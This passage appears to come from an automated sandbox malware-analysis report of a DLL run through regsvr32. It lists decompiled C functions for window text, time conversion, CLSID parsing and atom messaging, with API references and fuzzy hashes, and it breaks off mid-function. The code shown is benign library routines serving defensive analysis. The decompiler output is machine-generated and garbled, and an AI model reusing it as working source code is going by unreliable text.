                                                                                                                					FileTimeToSystemTime( *(_t96 + 0x10), _t96 - 0x28);
                                                                                                                					E10023C56(_t96 - 0x18, _t91, __eflags,  *(_t96 - 0x28) & 0x0000ffff,  *(_t96 - 0x26) & 0x0000ffff,  *(_t96 - 0x22) & 0x0000ffff,  *(_t96 - 0x20) & 0x0000ffff,  *(_t96 - 0x1e) & 0x0000ffff,  *(_t96 - 0x1c) & 0x0000ffff);
                                                                                                                					_push(0x400);
                                                                                                                					_push(0);
                                                                                                                					_push(_t96 + 0x10);
                                                                                                                					E10025850(0, _t96 - 0x18, _t91, _t95, __eflags);
                                                                                                                					 *((intOrPtr*)(_t96 - 4)) = 1;
                                                                                                                					E100219F5(_t96 - 0x18, _t90,  *(_t96 + 8),  *(_t96 + 0x10));
                                                                                                                					_t83 =  *(_t96 + 0x10) + 0xfffffff0;
                                                                                                                					__eflags =  *(_t96 + 0x10) + 0xfffffff0;
                                                                                                                				} else {
                                                                                                                					_t92 = GetWindowTextLengthA( *(_t96 + 8));
                                                                                                                					L1000140B(_t96 + 0xc, E100184C0());
                                                                                                                					_t12 = _t92 + 1; // 0x1
                                                                                                                					 *((intOrPtr*)(_t96 - 4)) = 0;
                                                                                                                					GetWindowTextA( *(_t96 + 8), E100103E6(_t96 + 0xc, _t60), _t12);
                                                                                                                					E1000FED3(_t96 + 0xc, 0xffffffff);
                                                                                                                					_t93 =  *((intOrPtr*)(_t96 + 0xc));
                                                                                                                					_t67 = E10024CA8(_t96 - 0x18, _t90, _t102, _t93, 0, 0x400);
                                                                                                                					_t101 = _t67;
                                                                                                                					if(_t67 == 0) {
                                                                                                                						_push(0xffffffff);
                                                                                                                						_push(0);
                                                                                                                						_push(0xf118);
                                                                                                                						E1001B561(0, _t90, _t93, _t95, _t101);
                                                                                                                						E1001ECE0(_t95);
                                                                                                                					}
                                                                                                                					_push(_t96 - 0x28);
                                                                                                                					E10023C1F(_t96 - 0x28, _t96 - 0x18, _t90);
                                                                                                                					SystemTimeToFileTime(_t96 - 0x28,  *(_t96 + 0x10));
                                                                                                                					_t83 = _t93 - 0x10;
                                                                                                                				}
                                                                                                                				return E10047725(L100013E3(_t83, _t90));
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10025B94
                                                                                                                • GetWindowTextLengthA.USER32 ref: 10025BDA
                                                                                                                • GetWindowTextA.USER32(?,00000000,00000000), ref: 10025C04
                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,000000FF), ref: 10025C51
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,0000001C), ref: 10025C63
                                                                                                                  • Part of subcall function 10023C56: _memset.LIBCMT ref: 10023C67
                                                                                                                  • Part of subcall function 10025850: __EH_prolog3.LIBCMT ref: 10025857
                                                                                                                  • Part of subcall function 100219F5: lstrlenA.KERNEL32(1001F17A,?,?,00000000), ref: 10021A1F
                                                                                                                  • Part of subcall function 100219F5: _memset.LIBCMT ref: 10021A3C
                                                                                                                  • Part of subcall function 100219F5: GetWindowTextA.USER32(?,00000000,00000100), ref: 10021A56
                                                                                                                  • Part of subcall function 100219F5: lstrcmpA.KERNEL32(00000000,1001F17A), ref: 10021A68
                                                                                                                  • Part of subcall function 100219F5: SetWindowTextA.USER32(?,1001F17A), ref: 10021A74
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TextTimeWindow$H_prolog3$FileSystem_memset$Exception@8LengthThrowlstrcmplstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3605897416-0
                                                                                                                • Opcode ID: 64716d980226eaca9e1eba3191ba87992bc159ea454a4b02de3db081957958aa
                                                                                                                • Instruction ID: a792ff8d2599d987b958d73a8b16588534a4e79e0e99e15e5fa06729617e6af3
                                                                                                                • Opcode Fuzzy Hash: 64716d980226eaca9e1eba3191ba87992bc159ea454a4b02de3db081957958aa
                                                                                                                • Instruction Fuzzy Hash: 56316C7940010AAFDF00DFA0DC819FE7779FF08351F508129FA11A6091EB35EA91DB64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1004249E(void* __ecx, void* __eflags, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				struct tagRECT _v24;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t44;
                                                                                                                				signed int _t48;
                                                                                                                				signed int _t52;
                                                                                                                				signed int _t57;
                                                                                                                				void* _t64;
                                                                                                                				signed int _t67;
                                                                                                                				void* _t75;
                                                                                                                				void* _t76;
                                                                                                                				signed int _t78;
                                                                                                                				void* _t80;
                                                                                                                
                                                                                                                				_t80 = __eflags;
                                                                                                                				_t75 = __ecx;
                                                                                                                				_v8 = E100177F8(__ecx);
                                                                                                                				GetWindowRect( *(__ecx + 0x20),  &_v24);
                                                                                                                				_t67 = GetSystemMetrics(0x21);
                                                                                                                				_t78 = GetSystemMetrics(0x20);
                                                                                                                				_t76 = E10013F46(_t67, _t75, _t75, _t80);
                                                                                                                				if((_v8 & 0x00001000) == 0) {
                                                                                                                					L5:
                                                                                                                					__eflags = _t76 - 0xa;
                                                                                                                					if(_t76 < 0xa) {
                                                                                                                						L7:
                                                                                                                						__eflags = _t76 - 4;
                                                                                                                						if(_t76 != 4) {
                                                                                                                							L16:
                                                                                                                							return _t76;
                                                                                                                						}
                                                                                                                						L8:
                                                                                                                						__eflags = _v8 & 0x00000800;
                                                                                                                						if((_v8 & 0x00000800) == 0) {
                                                                                                                							InflateRect( &_v24,  ~_t78,  ~_t67);
                                                                                                                							__eflags = _v8 & 0x00000200;
                                                                                                                							if((_v8 & 0x00000200) == 0) {
                                                                                                                								goto L16;
                                                                                                                							}
                                                                                                                							_t44 = _t76 - 4;
                                                                                                                							__eflags = _t44;
                                                                                                                							if(_t44 == 0) {
                                                                                                                								L21:
                                                                                                                								__eflags = _a8 - _v24.bottom;
                                                                                                                								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
                                                                                                                							}
                                                                                                                							_t48 = _t44 - 9;
                                                                                                                							__eflags = _t48;
                                                                                                                							if(_t48 == 0) {
                                                                                                                								__eflags = _a8 - _v24.top;
                                                                                                                								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
                                                                                                                							}
                                                                                                                							_t52 = _t48 - 1;
                                                                                                                							__eflags = _t52;
                                                                                                                							if(_t52 == 0) {
                                                                                                                								__eflags = _a8 - _v24.top;
                                                                                                                								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
                                                                                                                							}
                                                                                                                							_t57 = _t52;
                                                                                                                							__eflags = _t57;
                                                                                                                							if(_t57 == 0) {
                                                                                                                								__eflags = _a8 - _v24.bottom;
                                                                                                                								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
                                                                                                                							}
                                                                                                                							__eflags = _t57 == 1;
                                                                                                                							if(_t57 == 1) {
                                                                                                                								goto L21;
                                                                                                                							}
                                                                                                                							goto L16;
                                                                                                                						}
                                                                                                                						_t64 = 2;
                                                                                                                						return _t64;
                                                                                                                					}
                                                                                                                					__eflags = _t76 - 0x11;
                                                                                                                					if(_t76 <= 0x11) {
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					goto L7;
                                                                                                                				}
                                                                                                                				if(_t76 == 3) {
                                                                                                                					_t76 = 2;
                                                                                                                				}
                                                                                                                				if(GetKeyState(2) >= 0) {
                                                                                                                					goto L5;
                                                                                                                				} else {
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                			}


                                                                                                                APIs
                                                                                                                  • Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803
                                                                                                                • GetWindowRect.USER32 ref: 100424B8
                                                                                                                • GetSystemMetrics.USER32 ref: 100424C6
                                                                                                                • GetSystemMetrics.USER32 ref: 100424CC
                                                                                                                • GetKeyState.USER32(00000002), ref: 100424EB
                                                                                                                • InflateRect.USER32 ref: 10042520
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsRectSystemWindow$InflateLongState
                                                                                                                • String ID:
                                                                                                                • API String ID: 2406722796-0
                                                                                                                • Opcode ID: 2cd11d2c867d08c569cfb2d789efff36ef806e87dbca50b23167bba580d94d7d
                                                                                                                • Instruction ID: 95ef0437d9f863ab6c7eb43219b417ffc42352a2425f8ef67baea1a2dc3f029b
                                                                                                                • Opcode Fuzzy Hash: 2cd11d2c867d08c569cfb2d789efff36ef806e87dbca50b23167bba580d94d7d
                                                                                                                • Instruction Fuzzy Hash: 8921FB31B00919ABDB10EBB8CDA9BAEB7B9FF852D0FA14435D407DB091D570DD40C654
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 61%
                                                                                                                			E100256D5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t28;
                                                                                                                				void* _t37;
                                                                                                                				void* _t39;
                                                                                                                				intOrPtr _t49;
                                                                                                                				intOrPtr _t54;
                                                                                                                				void* _t55;
                                                                                                                				intOrPtr* _t75;
                                                                                                                				void* _t76;
                                                                                                                				void* _t78;
                                                                                                                				signed int _t81;
                                                                                                                				void* _t83;
                                                                                                                
                                                                                                                				_t73 = __edx;
                                                                                                                				_t81 = _t83 - 0x7c;
                                                                                                                				_t28 =  *0x100b9e70; // 0xbb35530
                                                                                                                				 *(_t81 + 0x80) = _t28 ^ _t81;
                                                                                                                				_push(0x70);
                                                                                                                				E1004764D(0x1008f90e, __ebx, __edi, __esi);
                                                                                                                				_t75 =  *((intOrPtr*)(_t81 + 0x8c));
                                                                                                                				_t54 =  *((intOrPtr*)(_t81 + 0x94));
                                                                                                                				E1001F0AF(_t75,  *((intOrPtr*)(_t81 + 0x90)));
                                                                                                                				E100176B3( *((intOrPtr*)(_t75 + 4)),  *((intOrPtr*)(_t81 + 0x90)), _t81 - 0x10);
                                                                                                                				_t87 =  *_t75;
                                                                                                                				if( *_t75 == 0) {
                                                                                                                					__imp__StringFromGUID2(_t54, _t81, 0x40);
                                                                                                                					_push(_t81);
                                                                                                                					_t37 = E10025504(_t54, _t81 - 0x7c, _t75, __esi, __eflags);
                                                                                                                					 *(_t81 - 4) = 1;
                                                                                                                					E100219F5(_t81 - 0x7c, __edx,  *(_t81 - 0x10),  *((intOrPtr*)(_t37 + 0xc)));
                                                                                                                					_t39 = E100252BD(_t81 - 0x7c, __eflags);
                                                                                                                				} else {
                                                                                                                					_t79 = GetWindowTextLengthA( *(_t81 - 0x10));
                                                                                                                					L1000140B(_t81 - 0x14, E100184C0());
                                                                                                                					 *(_t81 - 4) =  *(_t81 - 4) & 0x00000000;
                                                                                                                					_t13 = _t79 + 1; // 0x1
                                                                                                                					GetWindowTextA( *(_t81 - 0x10), E100103E6(_t81 - 0x14, _t41), _t13);
                                                                                                                					E1000FED3(_t81 - 0x14, 0xffffffff);
                                                                                                                					_t80 =  *((intOrPtr*)(_t81 - 0x14));
                                                                                                                					_t49 =  *((intOrPtr*)(E1000B9D2(_t54, _t81 - 0x18, _t75,  *((intOrPtr*)(_t81 - 0x14)), _t87)));
                                                                                                                					__imp__CLSIDFromString(_t49, _t54,  *((intOrPtr*)(_t81 - 0x14)));
                                                                                                                					_t56 = _t49;
                                                                                                                					L100013E3( *((intOrPtr*)(_t81 - 0x18)) + 0xfffffff0, _t73);
                                                                                                                					_t88 = _t49;
                                                                                                                					if(_t49 < 0) {
                                                                                                                						_push(0xffffffff);
                                                                                                                						_push(0);
                                                                                                                						_push(0xf11a);
                                                                                                                						E1001B561(_t56, _t73, _t75, _t80, _t88);
                                                                                                                						E1001ECE0(_t75);
                                                                                                                					}
                                                                                                                					_t39 = L100013E3(_t80 - 0x10, _t73);
                                                                                                                				}
                                                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t81 - 0xc));
                                                                                                                				_pop(_t76);
                                                                                                                				_pop(_t78);
                                                                                                                				_pop(_t55);
                                                                                                                				return E1004763E(_t39, _t55,  *(_t81 + 0x80) ^ _t81, _t73, _t76, _t78);
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100256F4
                                                                                                                  • Part of subcall function 100176B3: GetDlgItem.USER32(?,?), ref: 100176C0
                                                                                                                • GetWindowTextLengthA.USER32 ref: 10025730
                                                                                                                • GetWindowTextA.USER32(?,00000000,00000000), ref: 1002575B
                                                                                                                  • Part of subcall function 1000FED3: _strlen.LIBCMT ref: 1000FEE6
                                                                                                                  • Part of subcall function 1000B9D2: __EH_prolog3.LIBCMT ref: 1000B9D9
                                                                                                                • CLSIDFromString.OLE32(?,?), ref: 1002577B
                                                                                                                  • Part of subcall function 1001B561: __EH_prolog3.LIBCMT ref: 1001B568
                                                                                                                  • Part of subcall function 1001ECE0: SetFocus.USER32 ref: 1001ED09
                                                                                                                  • Part of subcall function 1001ECE0: SendMessageA.USER32 ref: 1001ED21
                                                                                                                • StringFromGUID2.OLE32(?,00000000,00000040), ref: 100257B8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3$FromStringTextWindow$FocusItemLengthMessageSend_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 131936272-0
                                                                                                                • Opcode ID: 542c5cde77eb5880299717873fbc9372932c1b254756384ade0b2ccb2610273e
                                                                                                                • Instruction ID: 094891cc8803010f02c60fe69b3d3b19e6c2dcd2f8403b547d8a15b464370062
                                                                                                                • Opcode Fuzzy Hash: 542c5cde77eb5880299717873fbc9372932c1b254756384ade0b2ccb2610273e
                                                                                                                • Instruction Fuzzy Hash: 5D313B79900109ABEB24DFA0DC82BFE7379FF04355F504129F926AB1D2DB34AA05CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E100010CD(void* __eax, void* __edx, short* _a4, int _a8) {
                                                                                                                				int _v4;
                                                                                                                				void* __ebx;
                                                                                                                				void* __ecx;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t17;
                                                                                                                				char** _t21;
                                                                                                                				char** _t22;
                                                                                                                				void* _t23;
                                                                                                                				int _t26;
                                                                                                                				int _t30;
                                                                                                                				void* _t33;
                                                                                                                				short* _t38;
                                                                                                                				void* _t39;
                                                                                                                
                                                                                                                				_t23 = __edx;
                                                                                                                				_t38 = _a4;
                                                                                                                				_t21 = _t22;
                                                                                                                				if(_t38 != 0) {
                                                                                                                					_t26 = lstrlenW(_t38) + 1;
                                                                                                                					_t30 = _t26 << 2;
                                                                                                                					L100011CC(_t21, _t21, _t30,  &(_t21[1]), 0x80);
                                                                                                                					_t39 = WideCharToMultiByte;
                                                                                                                					_t17 = WideCharToMultiByte(_a8, 0, _t38, _t26,  *_t21, _t30, 0, 0);
                                                                                                                					asm("sbb esi, esi");
                                                                                                                					_t33 =  ~_t17 + 1;
                                                                                                                					if(_t33 != 0) {
                                                                                                                						_t17 = GetLastError();
                                                                                                                						if(_t17 == 0x7a) {
                                                                                                                							_v4 = WideCharToMultiByte(_a8, 0, _a4, _t26, 0, 0, 0, 0);
                                                                                                                							L100011CC(_t21, _t21, _v4,  &(_t21[1]), 0x80);
                                                                                                                							_t17 = WideCharToMultiByte(_a8, 0, _a4, _t26,  *_t21, _v4, 0, 0);
                                                                                                                							asm("sbb esi, esi");
                                                                                                                							_t33 =  ~_t17 + 1;
                                                                                                                						}
                                                                                                                						if(_t33 != 0) {
                                                                                                                							_t17 = E10001005(_t22, _t23, _t39);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return _t17;
                                                                                                                				} else {
                                                                                                                					 *_t21 =  *_t21 & _t38;
                                                                                                                					return __eax;
                                                                                                                				}
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?), ref: 10002226
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000001,00000000,00000000), ref: 1000225B
                                                                                                                • GetLastError.KERNEL32(?,00000001,00000000,00000000), ref: 10002266
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000,?,00000001,00000000,00000000), ref: 10002281
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000000,?,00000001,00000000,00000000), ref: 100022AF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3322701435-0
                                                                                                                • Opcode ID: 2a3b8cb836da67e0ccb9ddea8f742ad8d8c87a6c19cb1d6ea04747123ffd58e7
                                                                                                                • Instruction ID: a391f8928b0f2ae8cbbebc98cfc85c77aed691913884041a6c09ebdd08697e0b
                                                                                                                • Opcode Fuzzy Hash: 2a3b8cb836da67e0ccb9ddea8f742ad8d8c87a6c19cb1d6ea04747123ffd58e7
                                                                                                                • Instruction Fuzzy Hash: AC11E932401274BFE7319A628C49EABBFECEF83BE0F404554FD8996015DA219C25C6F1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E100386BB(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				long _t42;
                                                                                                                				long _t45;
                                                                                                                				long _t52;
                                                                                                                				void* _t64;
                                                                                                                				void* _t68;
                                                                                                                				void* _t72;
                                                                                                                				void* _t74;
                                                                                                                				int _t76;
                                                                                                                				void* _t77;
                                                                                                                				void* _t84;
                                                                                                                
                                                                                                                				_t72 = __edx;
                                                                                                                				_t59 = __ebx;
                                                                                                                				_push(8);
                                                                                                                				E1004764D(0x10090d2c, __ebx, __edi, __esi);
                                                                                                                				_t74 = __ecx;
                                                                                                                				_t76 = 0;
                                                                                                                				 *(_t77 - 0x14) = 0;
                                                                                                                				if(( *( *((intOrPtr*)(__ecx + 0x74)) + 0x34) & 0x00080000) == 0 ||  *((intOrPtr*)(__ecx + 0x20)) == 0) {
                                                                                                                					L9:
                                                                                                                					_push( *((intOrPtr*)( *((intOrPtr*)(_t74 + 0x74)) + 0x1c)));
                                                                                                                					E1000B543(_t59,  *((intOrPtr*)(_t77 + 8)), _t74, _t76, _t84);
                                                                                                                				} else {
                                                                                                                					L1000140B(_t77 - 0x10, E100184C0());
                                                                                                                					 *(_t77 - 4) = 0;
                                                                                                                					_t76 = 0x104;
                                                                                                                					_t42 = L100011F4(_t77 - 0x10, 0x104);
                                                                                                                					_t59 = GetParent;
                                                                                                                					 *(_t77 - 0x14) = _t42;
                                                                                                                					_t45 = SendMessageA( *(E10013FEA(GetParent, _t77 - 0x10, _t77, GetParent( *(_t74 + 0x20))) + 0x20), 0x464, 0x104,  *(_t77 - 0x14));
                                                                                                                					_t64 = _t77 - 0x10;
                                                                                                                					if(_t45 >= 0) {
                                                                                                                						E1000FED3(_t64, 0xffffffff);
                                                                                                                					} else {
                                                                                                                						L100011D1(_t64);
                                                                                                                					}
                                                                                                                					if( *((intOrPtr*)( *((intOrPtr*)(_t77 - 0x10)) - 0xc)) == 0) {
                                                                                                                						L8:
                                                                                                                						 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
                                                                                                                						_t84 =  *((intOrPtr*)(_t77 - 0x10)) + 0xfffffff0;
                                                                                                                						L100013E3( *((intOrPtr*)(_t77 - 0x10)) + 0xfffffff0, _t72);
                                                                                                                						goto L9;
                                                                                                                					} else {
                                                                                                                						 *(_t77 - 0x14) = L100011F4(_t77 - 0x10, _t76);
                                                                                                                						_t52 = SendMessageA( *(E10013FEA(_t59, _t77 - 0x10, _t77, GetParent( *(_t74 + 0x20))) + 0x20), 0x465, _t76,  *(_t77 - 0x14));
                                                                                                                						_t68 = _t77 - 0x10;
                                                                                                                						if(_t52 >= 0) {
                                                                                                                							E1000FED3(_t68, 0xffffffff);
                                                                                                                							L100010F5( *((intOrPtr*)(_t77 + 8)), __eflags, _t77 - 0x10);
                                                                                                                							L100013E3( *((intOrPtr*)(_t77 - 0x10)) + 0xfffffff0, _t72);
                                                                                                                						} else {
                                                                                                                							L100011D1(_t68);
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return E10047725( *((intOrPtr*)(_t77 + 8)));
                                                                                                                			}














                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageParentSend$H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 1482283565-0
                                                                                                                • Opcode ID: 09b1453e6342188a1c2edcaf826d266a5714f08db37630e54f7a1ed38f046747
                                                                                                                • Instruction ID: cbea5dba2a6c1b6782beba48e7ce02a626e7777fb2f1a3a4d457981e434d63e9
                                                                                                                • Opcode Fuzzy Hash: 09b1453e6342188a1c2edcaf826d266a5714f08db37630e54f7a1ed38f046747
                                                                                                                • Instruction Fuzzy Hash: C2319A7590461AEFDB05DFB0CC85AEEBB71FF05350B200268F5216B1E6CB30AA00DB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 70%
                                                                                                                			E10035656(void* __ecx, void* __ebp, unsigned int _a4) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				struct HWND__* _t20;
                                                                                                                				void* _t21;
                                                                                                                				void* _t23;
                                                                                                                				void* _t34;
                                                                                                                				void* _t35;
                                                                                                                				struct HWND__* _t36;
                                                                                                                				void* _t37;
                                                                                                                
                                                                                                                				_t37 = __ebp;
                                                                                                                				_t29 = __ecx;
                                                                                                                				_t35 = __ecx;
                                                                                                                				if((E100177F8(__ecx) & 0x40000000) == 0) {
                                                                                                                					_t29 = __ecx;
                                                                                                                					_t34 = E10014BA7(__ecx);
                                                                                                                				} else {
                                                                                                                					_t34 = __ecx;
                                                                                                                				}
                                                                                                                				_t41 = _t34;
                                                                                                                				if(_t34 == 0) {
                                                                                                                					E1000A069(0, _t29, _t34, _t35, _t41);
                                                                                                                				}
                                                                                                                				_push(_t37);
                                                                                                                				if((_a4 & 0x0000000c) != 0) {
                                                                                                                					_t23 = E1001795E(_t34);
                                                                                                                					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t34 == _t35) {
                                                                                                                						SendMessageA( *(_t34 + 0x20), 0x86, 0, 0);
                                                                                                                					} else {
                                                                                                                						 *(_t35 + 0x3c) =  *(_t35 + 0x3c) | 0x00000200;
                                                                                                                						SendMessageA( *(_t34 + 0x20), 0x86, 1, 0);
                                                                                                                						 *(_t35 + 0x3c) =  *(_t35 + 0x3c) & 0xfffffdff;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_push(5);
                                                                                                                				_push(GetDesktopWindow());
                                                                                                                				while(1) {
                                                                                                                					_t20 = GetWindow();
                                                                                                                					_t36 = _t20;
                                                                                                                					if(_t36 == 0) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					_t21 = E10034C53( *(_t34 + 0x20), _t36);
                                                                                                                					__eflags = _t21;
                                                                                                                					if(_t21 != 0) {
                                                                                                                						SendMessageA(_t36, 0x36d, _a4, 0);
                                                                                                                					}
                                                                                                                					_push(2);
                                                                                                                					_push(_t36);
                                                                                                                				}
                                                                                                                				return _t20;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                  • Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803
                                                                                                                • SendMessageA.USER32 ref: 100356BC
                                                                                                                • SendMessageA.USER32 ref: 100356D1
                                                                                                                • GetDesktopWindow.USER32 ref: 100356D5
                                                                                                                • SendMessageA.USER32 ref: 100356FD
                                                                                                                • GetWindow.USER32(00000000), ref: 10035702
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$DesktopLong
                                                                                                                • String ID:
                                                                                                                • API String ID: 2272707703-0
                                                                                                                • Opcode ID: 52c92ffb03a877432c12eaf483e9684fa833189396604cfc91ae397ea414aa04
                                                                                                                • Instruction ID: 3d98941bdb409902b6d145e6d0440896241f45a2040b1dcf033ce4d8e4ed85b0
                                                                                                                • Opcode Fuzzy Hash: 52c92ffb03a877432c12eaf483e9684fa833189396604cfc91ae397ea414aa04
                                                                                                                • Instruction Fuzzy Hash: 7311E232200B166FE222DA208C83F6F7699EB45797F414118F5811F4F1CF63EC408AA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 65%
                                                                                                                			E10035E3A(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t23;
                                                                                                                				int _t29;
                                                                                                                				unsigned int _t49;
                                                                                                                				void* _t52;
                                                                                                                				void* _t55;
                                                                                                                				intOrPtr _t56;
                                                                                                                				void* _t57;
                                                                                                                				signed int _t58;
                                                                                                                				void* _t60;
                                                                                                                
                                                                                                                				_t53 = __edi;
                                                                                                                				_t52 = __edx;
                                                                                                                				_t43 = __ebx;
                                                                                                                				_t58 = _t60 - 0x90;
                                                                                                                				_t23 =  *0x100b9e70; // 0xbb35530
                                                                                                                				 *(_t58 + 0x8c) = _t23 ^ _t58;
                                                                                                                				_push(_t55);
                                                                                                                				 *((intOrPtr*)(_t58 - 0x80)) = __ecx;
                                                                                                                				 *(_t58 - 0x7c) =  *(_t58 + 0x98);
                                                                                                                				_t56 =  *((intOrPtr*)(E1001E302(__ebx, __edi, _t55, __eflags) + 4));
                                                                                                                				if(_t56 != 0 &&  *(_t58 + 0x9c) != 0) {
                                                                                                                					_t49 =  *(_t58 + 0x9c) >> 0x10;
                                                                                                                					if(_t49 != 0) {
                                                                                                                						_t29 =  *(_t56 + 0x90) & 0x0000ffff;
                                                                                                                						if( *(_t58 + 0x9c) == _t29 && _t49 ==  *(_t56 + 0x92)) {
                                                                                                                							_push(__ebx);
                                                                                                                							_push(__edi);
                                                                                                                							GlobalGetAtomNameA(_t29, _t58 - 0x78, 0x103);
                                                                                                                							GlobalAddAtomA(_t58 - 0x78);
                                                                                                                							GlobalGetAtomNameA( *(_t56 + 0x92) & 0x0000ffff, _t58 - 0x78, 0x103);
                                                                                                                							GlobalAddAtomA(_t58 - 0x78);
                                                                                                                							SendMessageA( *(_t58 - 0x7c), 0x3e4,  *( *((intOrPtr*)(_t58 - 0x80)) + 0x20), ( *(_t56 + 0x92) & 0x0000ffff) << 0x00000010 |  *(_t56 + 0x90) & 0x0000ffff);
                                                                                                                							_pop(_t53);
                                                                                                                							_pop(_t43);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_pop(_t57);
